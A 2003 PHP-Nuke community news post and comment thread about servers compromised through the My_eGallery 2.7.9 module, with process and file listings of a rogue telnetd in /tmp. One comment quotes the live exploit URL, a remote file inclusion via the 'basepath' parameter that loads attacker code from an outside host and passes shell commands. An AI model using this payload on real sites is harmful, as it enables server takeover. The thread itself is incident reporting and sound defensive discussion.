You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 286 guest(s) and 7 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Security Bug in My_eGallery 2.7.9
SecurityLaffer writes "I discovered that there seems to be a big security bug in My_eGallery and every day someone is exploiting and reinstalling some processes on my webserver. Very dangerous, because the Hacker uploads a file on the server and does put it in the /tmp directory and then can execute it (I do not know HOW by now!!!). But the LOGS show that the file is uploaded by My_eGallery...

If somebody has an idea????

Everybody should check his /tmp Directory for files with suspicous names like telnetd or bind.txt or files which have readable names. Look into those files if their are not Hacks...

I discovered on my server following processes:
6926 ? S 0:00 getty
6932 ? T 0:00 ./telnetd
6933 ? S 0:00 getty
6936 ? Z 0:00 [telnetd ]
6939 ? T 0:00 ./telnetd
6940 ? S 0:00 getty
6942 ? Z 0:00 [telnetd ]
6947 ? S 0:00 getty
7005 ? T 0:00 ./telnetd
7006 ? S 0:00 getty
7009 ? Z 0:00 [telnetd ]
7012 ? T 0:00 ./telnetd
7013 ? S 0:00 getty
7016 ? Z 0:00 [telnetd ]

Then:

-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----
?????:/tmp # stat telnetd
File: `telnetd'
Size: 170613 Blocks: 336 IO Block: 4096 Regular File
Device: 302h/770d Inode: 260574 Links: 1
Access: (7777/-rwsrwsrwt) Uid: ( 30/ wwwrun) Gid: (65534/ nogroup)
Access: 2003-11-18 22:52:41.000000000 +0100
Modify: 2003-02-07 18:35:31.000000000 +0100
Change: 2003-11-18 22:21:35.000000000 +0100
-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----

Looking further:
002 30 6926 1 17 0 2012 488 schedu S ? 0:00 getty
SHELL=/bin/sh MAILTO=root
OLDPWD=/???/www/?????/www.????????.de/modules/My_eGallery/public
LD_LIBRARY_PATH=:/lib COLUMNS=80
PATH=/usr/bin:/usr/sbin:/sbin:/bin:/usr/lib/news/bin RUNLEVEL=3 PWD=/tmp
DAEMON=/usr/sbin/httpd PREVLEVEL=N LINES=24 DBROOT=/dev/null HOME=/root
SHLVL=4 LOGNAME=root ORACLE_HOME= _=./telnetd
002 30 6932 1 17 0 2008 452 do_sig T ? 0:00
./telnetd SHELL=/bin/sh MAILTO=root
OLDPWD=/???/www/??????/www.???????.de/modules/My_eGallery/public
LD_LIBRARY_PATH=:/lib COLUMNS=80
PATH=/usr/bin:/usr/sbin:/sbin:/bin:/usr/lib/news/bin RUNLEVEL=3 PWD=/tmp
DAEMON=/usr/sbin/httpd PREVLEVEL=N LINES=24 DBROOT=/dev/null HOME=/root
SHLVL=4 LOGNAME=root ORACLE_HOME= _=./telnetd
"
Posted on Wednesday, November 19 @ 09:47:39 CET by Zhen-Xjell
 
Related Links
· Computer Cops
· More about Security
· News by Zhen-Xjell


Most read story about Security:
PHP-Nuke admin.php security hole - PATCHED

Article Rating
Average Score: 4.5
Votes: 2


Please take a second and vote for this article:

Excellent
Very Good
Good
Regular
Bad


Options

 Printer Friendly Page  Printer Friendly Page

 Send to a Friend  Send to a Friend

Threshold
The comments are owned by the poster. We aren't responsible for their content.

No Comments Allowed for Anonymous, please register

Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by Johan1982 on Wednesday, November 19 @ 10:26:28 CET
(User Info | Send a Message)
Somebody knows some solution on this?



Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by judas (judas_iscariote@piscola.com) on Wednesday, November 19 @ 10:40:13 CET
(User Info | Send a Message)
hi:
in the past,i was help a friend,his site files was disapear,and the only suspiciuos thing was the My_egallery module,I was ckeck the code,but I can t find the posibble bug,maybe chatserv(if he is online again) can tell us something about it..
I believe my_egallery allows code execution on some buggy function...
bye



Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by Jeruvy on Wednesday, November 19 @ 18:24:03 CET
(User Info | Send a Message)
For now at least I'd disable uploading. I never used eGallery as I didn't think it did enough sanitization compared to Coppermine. My only (crappy) suggestion would be to remove eGallery, and use Coppermine.

Not the best answer, but I'm also not interested in learning another module, I've already decided isn't in my best interests to use... =(

J.



Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by luisba on Friday, November 21 @ 05:18:38 CET
(User Info | Send a Message)
I have the same problem. I discovered that the line used is

/modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;ls

or similar

and you can use it although you have disable the module.

It's a bug very dangerous but i don't know how stop it. I deleted the module My_eGallery.

I hope that above line can help.




Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by Jeruvy on Thursday, November 27 @ 20:40:26 CET
(User Info | Send a Message)
NOTE: Bugtraq has released a vulnerability for eGallery. I have posted it for news, but it hasn't been made available as of yet.

In any case send me a msg if you want the link or go get it yourself on the bugtraq archives.




Re: Security Bug in My_eGallery 2.7.9 (Score: 1)
by Laffer on Friday, November 28 @ 10:10:28 CET
(User Info | Send a Message) http://www.comicfan.de
I found the exec($cmd) lines in the imageFunctions.php but even when I outcommented those lines, the exploit works... Crazy...


Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.033 Seconds - 251 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::